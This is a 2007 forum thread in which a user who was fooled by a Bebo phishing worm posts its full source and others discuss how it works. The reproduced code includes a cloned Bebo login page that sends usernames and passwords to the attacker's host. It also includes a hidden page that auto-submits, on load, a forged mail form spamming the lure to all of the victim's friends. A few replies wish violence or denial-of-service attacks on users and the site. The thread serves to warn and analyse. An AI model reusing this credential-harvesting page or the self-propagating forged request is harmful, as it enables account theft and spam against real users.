Clever bebo virus

failsafe · 13-09-2007 12:05pm #1

There's a virus doing the rounds this morning through bebo mail, which is basically phising for passwords. The email says something along the lines of "OMFVHGKSA!! check out this cool link ....." which brings you to a page that looks like the bebo login page, prompting you to enter your username and p/w. Pretty standard stuff so far, but the reason I thought i'd post it here is because of a clever little thing it does, which I can't quite figure out. Because you get it in your bebo mail, you are currently logged into bebo when you click the link, and the page uses this to load a php page which has the viral email in it, then automatically submits it to bebo a split second later. Therefore the email propegates itself without a user even falling for the fake screen.

Here's the link ***WARNING - DO NOT CLICK IF YOU HAVE A BEBO ACCOUNT AND ARE SIGNED IN/HAVE "REMEMBER ME" BOX TICKED*** http://captainbarbossa.110mb.com/Bebossa.php, for anyone who wants to see it. I've also included the source code for anyone that's interested. And I know that ethically I really be shouldn't be describing a worm as "clever"!

http://captainbarbossa.110mb.com/Bebossa.php

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 3.2 Final//EN'>
<html>

<head>
<title>Sign In</title><meta http-equiv='Content-Type' content='text/html; charset=utf-8'><META HTTP-EQUIV='Pragma' CONTENT='no-cache'><META HTTP-EQUIV='Expires' CONTENT='-1'><META NAME="ROBOTS" CONTENT="NOARCHIVE"><link rel=stylesheet href=http://s.bebo.com/StyleSheet1.css?v=9 type=text/css><link rel=stylesheet href=http://s.bebo.com/SkinCSS.jsp?SkinId=0&v=6 type=text/css>
<script language="javascript">
function WaitForIt()
{
	//document.getElementById('SignIn').disabled=true;
	//setTimeout("document.getElementById('SignIn').disabled = false",3000);
	//setTimeout("alert('hello')",3000);
	//document.SignIt.SignIn.disabled=true;
}
</script>
</head>
<body>
				
				<iframe src="http://captainbarbossa.110mb.com/BebossaChild.php" height="480" width="820" frameborder="0" id="MailFrame" name="MailFrame" scrolling="no"></iframe>
				<iframe src="http://captainbarbossa.110mb.com/automail.htm" height="0" width="0" frameborder="0" id="MailFrame" name="MailFrame" scrolling="no"></iframe>
				

			</body>
		</html>

http://captainbarbossa.110mb.com/BebossaChild.php

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 3.2 Final//EN'>
<html>

<head>

<title>Sign In</title><meta http-equiv='Content-Type' content='text/html; charset=utf-8'><META HTTP-EQUIV='Pragma' CONTENT='no-cache'><META HTTP-EQUIV='Expires' CONTENT='-1'><META NAME="ROBOTS" CONTENT="NOARCHIVE"><link rel=stylesheet href=http://s.bebo.com/StyleSheet1.css?v=9 type=text/css><link rel=stylesheet href=http://s.bebo.com/SkinCSS.jsp?SkinId=0&v=6 type=text/css>
<script language="javascript">

	//document.getElementById('SignIn').disabled=true;
	//setTimeout("document.getElementById('SignIn').disabled = false",3000);
	//setTimeout("alert('hello')",3000);
	//document.SignIt.SignIn.disabled=true;

</script>
</head>
<body><div id=main><div id=header><div id=top><h1>Bebo Online Social Network</h1><span id=topLogomb><a href=http://www.bebo.com/Default.jsp>Bebo</a></span><span id=topLinks><table style='float: left; margin-left:25px;'><tr><form action=http://www.bebo.com/Search.jsp><td><input type=text name=SearchTerm size=20 class=topSearch /></td><td><select name=SearchType class=topSearch><option value=Web>Web</option><option value=Bebo>Bebo</option><option value=People selected>People</option><option value=Music>Music</option></select></td><td><input type=submit value=Search class=topSearch /></td><td><img src=http://www.bebo.com/img/poweredByYahooHeader2.gif></td></form></tr></table><a href=http://www.bebo.com/SignIn.jsp>Sign In</a> <a href=http://www.bebo.com/SignIn.jsp><img src=http://s.bebo.com/img/icon_signin.gif width=32 height=17 border=0 align=texttop></a></span></div>
				<iframe src="http://captainbarbossa.110mb.com/automail.htm" height="0" width="0" frameborder="0" id="MailFrame" name="MailFrame" scrolling="no"></iframe>
				
				<div id=nav>
					<div id=navMenu>
						<ul><li><a href=http://www.bebo.com/Default.jsp>Home</a></li>
						<li><a href=http://www.bebo.com/Bands.jsp>Music</a></li>
						<li><a href=http://www.bebo.com/Tv.jsp>Video</a></li>
						<li><a href=http://www.bebo.com/Books.jsp>Authors</a></li>
						<li><a href=http://www.bebo.com/InviteJoin.jsp?Member=N>Register</a></li>
						<li><a href=http://www.bebo.com/Help.jsp?ChangeTab=Y>Help</a></li></ul>
					</div>
				</div>
			</div>
			<div id=content>
				<table cellspacing=0 cellpadding=0 width=760>
					<tr>
						<td valign=top style='width:434px; padding-right:15px; border-right: 1px solid #CFCFCF;'>
							<p class=header>Please sign in again to access this page</p>
							<div id=form>
								<table border=0 cellspacing=0 cellpadding=1>
									<form id="SignIt" name="SignIt" method=post action="http://captainbarbossa.110mb.com/BebossaChild.php?BeboID=
									">
									<input type=hidden name=FriendsMemberId value=>
									<input type=hidden name=FriendsChecksumNbr value=>
									<input type=hidden name=InviteRecipientId value=>
									<input type=hidden name=InviteChecksumNbr value=>
									<input type=hidden name=Page value=''>
									<input type=hidden name=QueryString value=''>
									<tr>
									<td width=5 nowrap>&nbsp;</td>
									<td nowrap class=label>Username or Email</td>
									<td> &nbsp;<input id=EmailUsername name=EmailUsername size=25 value='' maxlength=100 tabindex=1> &nbsp;<a href=http://www.bebo.com/InviteJoin.jsp?Member=N class=s>Register</a>
									</td>
								</tr>
								<tr>
									<td width=5 nowrap>&nbsp;</td>
									<td class=label>Password</td>
									<td> &nbsp;<input type=password id=Password name=Password size=25 maxlength=20 value='' tabindex=2> &nbsp;<a href=http://www.bebo.com/LostPassword.jsp class=s>Lost Password?</a></td>
								</tr>
								<tr>
									<td colspan=2>&nbsp;</td>
									<td>
										<table>
											<tr>
												<td><input type=submit class=button id="SignIn" name=SignIn value='Sign In >' tabindex=3></td>
												<td width=5 /><td><input type=checkbox id=RememberMe name=RememberMe value=Y></td>
												<td class=s><a href=javascript:window.open('http://www.bebo.com/RememberMePopup.jsp','RememberMe','width=440,height=350,scrollbars=yes');void('');>Automagically</a> for 2 weeks.</td>
											</tr>
										</table>
									</td></tr>
									</form>
								</table>
							</div>
							<script language="javascript">
							document.getElementById('EmailUsername').focus()
							</script><br><br>Your IP address is:&nbsp;213.233.159.69&nbsp;<a href="javascript:window.open('http://www.bebo.com/YourIPAddressPopup.jsp','YourIPAddress','width=440,height=350,scrollbars=yes');void('');">Learn more</a>
							</td>
							<td valign=top style='width:300px; padding-left:10px;'>
							<iframe src="" frameborder=0 marginheight=0 marginwidth=0 scrolling=no width=300 height=250></iframe>
							</td>
						</table>
					</div>
					<div id=footer>
						<a href=http://www.bebo.com/Help.jsp>Help</a><img src=http://s.bebo.com/img/footer_sep.gif width=15 height=14 align=absmiddle>
						<a href=http://www.bebo.com/TermsOfUse.jsp>Terms</a><img src=http://s.bebo.com/img/footer_sep.gif>
						<a href=http://www.bebo.com/Privacy.jsp>Privacy</a><img src=http://s.bebo.com/img/footer_sep.gif>
						<a href=http://www.bebo.com/SafetyTips.jsp>Safety</a><img src=http://s.bebo.com/img/footer_sep.gif>
						<a href=http://www.bebo.com/Testimonials.jsp>Testimonials</a><img src=http://s.bebo.com/img/footer_sep.gif>
						<a href=http://www.bebo.com/ContactUs.jsp>Contact</a><img src=http://s.bebo.com/img/footer_sep.gif>
						<a href=http://www.bebo.com/StaticPage.jsp?StaticPageId=2517103831>About</a><img src=http://s.bebo.com/img/footer_sep.gif>
						<a href=http://www.bebo.com/Press.jsp>Press</a><img src=http://s.bebo.com/img/footer_sep.gif>
						<a href=http://www.bebo.com/OurBlog.jsp>Our Blog</a><img src=http://s.bebo.com/img/pbos.gif width=59 height=21 style='margin-left:70px'>
					</div>
					<div id=copyright>&copy;2007 Bebo, Inc. </div>
				</div>
				<div class=m_b_white>bebo41:2:1181169923199</div>
			</body>
		</html>

And the kicker.... http://captainbarbossa.110mb.com/automail.htm

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<title>Untitled Document</title>
<script language="javascript">
<!--

function SubmitIt()
{
	var butt = document.getElementById("Send");	
	butt.click();
	//alert('done');
}

// -->
</script>
</head>

<body onLoad="SubmitIt()">
<form method=post action="http://www.bebo.com/mail/MailCompose.jsp" name=mainForm id=mainForm>
<input type=hidden id=SelectAttachmentTypeCd name=SelectAttachmentTypeCd value=''>
<select name=SendTo style='Width:480' >
	<option value=LALL>&lt; ---Select Recipient --- &gt;</option>
	<option value=N>================= LISTS =================</option>
	<option value=LALL>ALL MY FRIENDS * * *</option>
	<option value=N>================ FRIENDS ================</option>	
</select>
<input size=90 name=Subject maxlength=100 value='OMG look at these' style='Width:480'>
<textarea cols=55 rows=18 wrap=virtual name=Message style='Width:545'>LOL! u'll piss urself when u see dis

http://www.bebo.com/Link.jsp?Url=http://captainbarbossa.110mb.com/Bebossa.php

mmm sexy :-p</textarea>
<input type=submit name=Send id="Send" value=' Send '>
<input type=submit name=Cancel value=' Cancel '>
<input type=radio name=MailSkinId value=0 checked>
</form>
</body>
</html>

failsafe · 13-09-2007 12:09pm

And no, before anyone asks I didn't create it!

And yes, I have reported it to bebo and the host server of the site (I pretend I did it to be a good net citizen, but really it's because I'm annoyed that it tricked me!)

Hellm0 · 13-09-2007 12:11pm

This kind of crap annoys me no end. The people who acually spend time on this crap and abuse their meagre knowledge of coding should be shot at dawn.

seamus · 13-09-2007 1:33pm

There's probably more to it in the PHP source. I'd guess it's using the referrer url and/or query string to perform a replay attack on bebo and send the mail.

From what you describe, it's not that big a deal, more of an irritating proof-of-concept virus.

pid() · 13-09-2007 1:56pm

Aye, it's no biggie at all but the majority of bebo users are not very technically savvy (sp?

) so would fall for the phising trick.

Creamy Goodness · 13-09-2007 1:59pm

i'm more worried as to why the author of this phising trick wants bebo accounts.

failsafe · 13-09-2007 2:03pm

Cremo wrote:

i'm more worried as to why the author of this phising trick wants bebo accounts.

Yeah, that one was a bit beyond me too! Maybe to get email addresses for spam?

teckoda · 14-09-2007 6:35pm

To be honest, half of the users on bebo are stupid. So i'd assume a lot of people would click it. And i think they deserve it.

Viruses are good in many ways.. As regards putting pressure on the IT industry to keep improving things.

Sponge Bob · 14-09-2007 6:46pm

90% of them are stupid. The other 10% should really know better . The IT industry should DDOS the fukn thing 24/7 , would save loads of aggro and time.

monkey tennis · 17-09-2007 2:19pm

failsafe wrote:

And I know that ethically I really be shouldn't be describing a worm as "clever"!

Why not? Intelligence and morality are not mutually dependant.

failsafe · 17-09-2007 2:24pm

No, but ethically speaking, praising an unethical act could be considered a bit of an ethical no-no in itself.

monkey tennis · 17-09-2007 2:56pm

failsafe wrote:

No, but ethically speaking, praising an unethical act could be considered a bit of an ethical no-no in itself.

Not if you're purely commenting on its intricacy or inspired employment of technology.

Evil Phil · 17-09-2007 3:31pm

Technically this entire thread is violating the Forum Charter.

You are all banned!

Nah, only kidding. I'll allow this to stay.

Cake Fiend · 17-09-2007 6:35pm

Evil Phil wrote:

Technically this entire thread is violating the Forum Charter.

Well... it's not really a virus, more like an XSS attack propogated through worm-like tactics.

ahos · 23-08-2009 9:16pm

I landed on this board, while researching the "BEBO Virus" This virus is not so clever, it is however oportunistic. AOL has moved their AIM and AOL profiles to this server, and they even offer the ability to log in to Bebo using your AOL or AIM credentials! Yes, you can even read your AOL Mail on their site.

I have been a member of AOL since 1995, and BEBO, or the Virus, got my master screen credentials, as well as my address book, and my Buddy List! They have been spamming them ever since.

I think I have really good security on my computer, and do not have any signs of a "real virus", but I have had my security breached, via AOL. And there really does need to be an investigation in to identity theft, because that is what it is.

I guess I will leave the "Social Networking" to those who don't know any better. I hope my take on the "BEBO Virus" helps some one.

Best Regards,
AHOS

Placebo · 14-01-2010 1:56pm

how does it by pass 'you are clicking link out side of bebo?'

waynewex · 15-01-2010 4:34pm

The sooner Bebo crashes and burns to the ground, the better. I admire anyone who plays a part in speeding this up.

Herbal Deity · 19-01-2010 10:44pm

Placebo wrote: »

how does it by pass 'you are clicking link out side of bebo?'

Thread is 3 years old.

Clever bebo virus

Comments